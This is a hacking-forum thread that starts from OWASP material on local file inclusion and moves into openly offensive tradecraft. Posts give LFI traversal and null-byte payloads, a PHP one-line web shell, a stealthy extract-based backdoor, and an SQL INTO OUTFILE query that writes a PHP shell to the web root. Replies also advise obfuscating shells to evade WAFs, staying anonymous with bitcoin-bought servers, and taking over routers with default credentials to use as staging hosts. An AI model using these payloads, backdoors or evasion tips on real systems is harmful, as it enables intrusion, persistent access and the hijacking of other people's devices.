[Video] Basic LFI and uploading PHP Shell
#1
LFI Introduction

OWASP Wrote:Summary
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead to:
  • Code execution on the web server
  • Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)
  • Denial of Service (DoS)
  • Sensitive Information Disclosure
Local File Inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.


Video Example


(Tools used: Firefox browser with Hackbar addon, Access to /etc/passwd/ with exploitation done through php://input wrapper. There is other methods as well.)


LFI Example


OWASP Wrote:Since LFI occurs when paths passed to "include" statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters.

Consider the following example:
http://vulnerable_host/preview.php?file=example.html


This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.

Typical proof-of-concept would be to load passwd file:
http://vulnerable_host/preview.php?file=../../../../etc/passwd


If the above mentioned conditions are met, an attacker would see something like the following:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alex:x:500:500:alex:/home/alex:/bin/bash
margo:x:501:501::/home/margo:/bin/bash
...

Very often, even when such vulnerability exists, its exploitation is a bit more complex. Consider the following piece of code:
Code:
<?php “include/”.include($_GET['filename'].“.php”); ?>

In the case, simple substitution with arbitrary filename would not work as the postfix 'php' is appended. In order to bypass it, a technique with null-byte terminators is used. Since %00 effectively presents the end of the string, any characters after this special byte will be ignored. Thus, the following request will also return an attacker list of basic users attributes:
http://vulnerable_host/preview.php?file=../../../../etc/passwd%00


Further Reading:
References:
  • OWASP
  • Wikipedia
  • Hapedia
  • Daisuke Dan
Reply
#2
Interesting, so besides trashing the site what could someone really do with this? Proxying requests would be useful (and here it's not even necessary to to file upload). If say file upload was exposed and the url fetching wasn't that would be a nice php file to have.

Privilege escalation or SSH access would obviously be nice, but neither is trivial and may not work.

Also these both interesting, just a way to create a more consistent access shell.
http://pentestmonkey.net/cheat-sheet/she...heat-sheet
http://pentestmonkey.net/tools/web-shell...sock-shell
Reply
#3
(01-03-2017, 01:48 AM)StickFigure Wrote: Interesting, so besides trashing the site what could someone really do with this? Proxying requests would be useful (and here it's not even necessary to to file upload). If say file upload was exposed and the url fetching wasn't that would be a nice php file to have.

Privilege escalation or SSH access would obviously be nice, but neither is trivial and may not work.

Also these both interesting, just a way to create a more consistent access shell.
http://pentestmonkey.net/cheat-sheet/she...heat-sheet
http://pentestmonkey.net/tools/web-shell...sock-shell

Well Privilege escalation and SSH access was just was I thinking. Just set up a reverse shell, connect with bash or something and start looking for kernel exploits and such.

Good cheatsheet: http://pentestmonkey.net/cheat-sheet/she...heat-sheet
Some basics on priv-escalation: https://greysec.net/showthread.php?tid=1355

A friend of mine did just that through an LFI vulnerability, gained reverse shell among many things. Got the database credentials from source codes, root via exploit. Well the possibilities are many, just think outside the box sometimes. The company was also reasonably big, for which reason I will not mention it here Smile

Edit:
More specific details on PHP Reverse shell. http://pentestmonkey.net/tools/web-shell...erse-shell

Edit 2:
Sorry, I'm silly. I did read your post, but didn't realize you were refering to the exact same thing, with those links Smile Yes indeed, reverse shell is very useful!
Reply
#4
(01-03-2017, 03:26 PM)Insider Wrote: A friend of mine did just that through an LFI vulnerability, gained reverse shell among many things. Got the database credentials from source codes, root via exploit. Well the possibilities are many, just think outside the box sometimes. The company was also reasonably big, for which reason I will not mention it here Smile

Edit:
More specific details on PHP Reverse shell. http://pentestmonkey.net/tools/web-shell...erse-shell

Is there a reason reverse shell would be favored to a "regular" ole shell? (Like the php-find-sock one). And does such a thing have a common name? Unfortunately "php shell exploit" variations turn up either reverse shell or just literal shell exploits.

It seems like it would be less desired because you have to burn an IP address. I guess it's less complex and less likely to hit a firewall.

Now that I think about it, couldn't any sql injection with write access exploit this? You don't really need to write a new file you could borrow an existing one.
Reply
#5
(01-04-2017, 01:30 AM)StickFigure Wrote: Is there a reason reverse shell would be favored to a "regular" ole shell? (Like the php-find-sock one). And does such a thing have a common name? Unfortunately "php shell exploit" variations turn up either reverse shell or just literal shell exploits.

It seems like it would be less desired because you have to burn an IP address. I guess it's less complex and less likely to hit a firewall.

Now that I think about it, couldn't any sql injection with write access exploit this? You don't really need to write a new file you could borrow an existing one.

Well with a reverse shell you will have a more interactive interface to deal with and simply easier to escalate the hack with stuff like priv-esc, maintaining access, download exploits and stuff.

It would probably be possible through a simple php rce shell, like shell.php?cmd=ls (commands) but all the same it would be pretty ineffective in my opinion to work with this in the webbrowser, not to mention that it will all be very visible in the webserver logs and WAF. 

If you have server or domain this would be pretty feasable, yeah. Just need to make sure you buy the server anonymously and pay with bitcoins and all those things.

I'm not sure if you can do this through SQL injection It depends on the situation, if mysql runs as root etc. But if you can create php shells and such with the sql injection, I'm sure you could also use it to add a reverse shell. 
Related: https://greysec.net/showthread.php?tid=211

Edit: Yeah regarding IPs and servers I think you could probably use hacked contraband machines for this, like staging servers. Maybe scan ip ranges and grab banners for routers with ssh access and try using default credentials, a method that works a lot if you know which routers to look for. I've yet to try this with reverse shells, but they're certainly great for getting free anonymizing ssh tunnels with residential IPs.
Reply
#6
(01-04-2017, 01:40 AM)Insider Wrote: Well with a reverse shell you will have a more interactive interface to deal with and simply easier to escalate the hack with stuff like priv-esc, maintaining access, download exploits and stuff.

It would probably be possible through a simple php rce shell, like shell.php?cmd=ls (commands) but all the same it would be pretty ineffective in my opinion to work with this in the webbrowser, not to mention that it will all be very visible in the webserver logs and WAF. 

If you have server or domain this would be pretty feasable, yeah. Just need to make sure you buy the server anonymously and pay with bitcoins and all those things.

I'm not sure if you can do this through SQL injection It depends on the situation, if mysql runs as root etc. But if you can create php shells and such with the sql injection, I'm sure you could also use it to add a reverse shell. 
Related: https://greysec.net/showthread.php?tid=211

Edit: Yeah regarding IPs and servers I think you could probably use hacked contraband machines for this, like staging servers. Maybe scan ip ranges and grab banners for routers with ssh access and try using default credentials, a method that works a lot if you know which routers to look for. I've yet to try this with reverse shells, but they're certainly great for getting free anonymizing ssh tunnels with residential IPs.

Ah "rce" was the word I was looking for. Thanks for the info Insider, good stuff.

About sql injection (ok this hasn't been totally thought out), say you have a shell.php file, ignoring syntax and escaping difficulties, it should be possible to use the contents of shell.php as a payload, no?
Just to think in the most basic terms, MySQL file r/w is actually pretty nifty too, but as you said requires root.

Edit: Oh nvm I'm thinking like we could write out a php function and have it be interpreted, obvioudly php doesn't work like that :doh:
Reply
#7
(01-04-2017, 02:19 AM)StickFigure Wrote:
(01-04-2017, 01:40 AM)Insider Wrote: Well with a reverse shell you will have a more interactive interface to deal with and simply easier to escalate the hack with stuff like priv-esc, maintaining access, download exploits and stuff.

It would probably be possible through a simple php rce shell, like shell.php?cmd=ls (commands) but all the same it would be pretty ineffective in my opinion to work with this in the webbrowser, not to mention that it will all be very visible in the webserver logs and WAF. 

If you have server or domain this would be pretty feasable, yeah. Just need to make sure you buy the server anonymously and pay with bitcoins and all those things.

I'm not sure if you can do this through SQL injection It depends on the situation, if mysql runs as root etc. But if you can create php shells and such with the sql injection, I'm sure you could also use it to add a reverse shell. 
Related: https://greysec.net/showthread.php?tid=211

Edit: Yeah regarding IPs and servers I think you could probably use hacked contraband machines for this, like staging servers. Maybe scan ip ranges and grab banners for routers with ssh access and try using default credentials, a method that works a lot if you know which routers to look for. I've yet to try this with reverse shells, but they're certainly great for getting free anonymizing ssh tunnels with residential IPs.

Ah "rce" was the word I was looking for. Thanks for the info Insider, good stuff.

About sql injection (ok this hasn't been totally thought out), say you have a shell.php file, ignoring syntax and escaping difficulties, it should be possible to use the contents of shell.php as a payload, no?
Just to think in the most basic terms, MySQL file r/w is actually pretty nifty too, but as you said requires root.

Well sure you can use the contents of shell.php as the payload but that sounds pretty static leaving you with little options if you want to try new stuff. Which is why I usually just prefer simple one-liners that lets me enter commands through GET requests and stuff.

Code:
system($_GET['cmd']);

URL: shell.php?cmd=ls

Of course you should probably obfuscate that (with base64 + eval maybe), or maybe even split up the shell into several smaller parts and use include to make them into one complete file. There's many interesting tricks.

Screw all these complete and big featured PHP shells like c99 Tongue Most of the filenames are blocked by waf and almost all of them contains backdoor made by the developer, at least in my own experience. 

Another more stealthy version of those types of backdoor (Not mine, I found this on another forum):
Code:
@extract ($_REQUEST);
@die ($ctime($atime));
URL: config.php?ctime=system&atime=ls
Reply
#8
(01-04-2017, 02:19 AM)StickFigure Wrote:
(01-04-2017, 01:40 AM)Insider Wrote: Well with a reverse shell you will have a more interactive interface to deal with and simply easier to escalate the hack with stuff like priv-esc, maintaining access, download exploits and stuff.

It would probably be possible through a simple php rce shell, like shell.php?cmd=ls (commands) but all the same it would be pretty ineffective in my opinion to work with this in the webbrowser, not to mention that it will all be very visible in the webserver logs and WAF. 

If you have server or domain this would be pretty feasable, yeah. Just need to make sure you buy the server anonymously and pay with bitcoins and all those things.

I'm not sure if you can do this through SQL injection It depends on the situation, if mysql runs as root etc. But if you can create php shells and such with the sql injection, I'm sure you could also use it to add a reverse shell. 
Related: https://greysec.net/showthread.php?tid=211

Edit: Yeah regarding IPs and servers I think you could probably use hacked contraband machines for this, like staging servers. Maybe scan ip ranges and grab banners for routers with ssh access and try using default credentials, a method that works a lot if you know which routers to look for. I've yet to try this with reverse shells, but they're certainly great for getting free anonymizing ssh tunnels with residential IPs.

Ah "rce" was the word I was looking for. Thanks for the info Insider, good stuff.

About sql injection (ok this hasn't been totally thought out), say you have a shell.php file, ignoring syntax and escaping difficulties, it should be possible to use the contents of shell.php as a payload, no?
Just to think in the most basic terms, MySQL file r/w is actually pretty nifty too, but as you said requires root.

Edit: Oh nvm I'm thinking like we could write out a php function and have it be interpreted, obvioudly php doesn't work like that :doh:

Well if the the user within who's context the database process is running has write access you can write out a shell with the `limit into outfile`/`lines terminated by` method.

The MySQL query proper, would look a little like this.

Code:
SELECT * FROM user_credentials WHERE `username` = 'Vector'

SELECT * FROM user_credentials WHERE `username` = 'Vector' LIMIT 0,1 INTO OUTFILE '/var/www/tmpulhxi.php' LINES TERMINATED BY 0x36 ... AND 'PipI'='PipI'

First you make the request then you append the `limit into outfile` declaration.

At least that is how SQLmap does it when you provide the --os-shell flag.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] PHP CGI exploit Insider 0 507 06-16-2020, 11:34 AM
Last Post: Insider
  [Tutorial] Request header MySQL injection using netcat and burp suite Insider 0 513 06-16-2020, 02:53 AM
Last Post: Insider
  Basics of website and server hacking Insider 0 1,568 03-26-2020, 09:34 PM
Last Post: Insider
  Re-posted and Updated [Complete MySQL Injection] Insider 5 12,522 04-28-2019, 09:46 PM
Last Post: thunder